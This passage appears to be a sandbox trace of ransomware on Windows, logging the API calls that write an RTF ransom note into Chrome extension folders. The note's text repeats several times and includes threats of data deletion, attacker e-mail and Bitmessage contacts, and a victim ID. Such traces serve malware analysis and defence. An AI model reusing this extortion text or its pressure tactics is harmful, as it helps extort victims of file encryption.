th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.178] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9f\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0278.178] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.178] CloseHandle (hObject=0x294) returned 1 [0278.178] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\#readme_eman#.rtf")) returned 0xffffffff [0278.178] GetLastError () returned 0x2 [0278.179] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 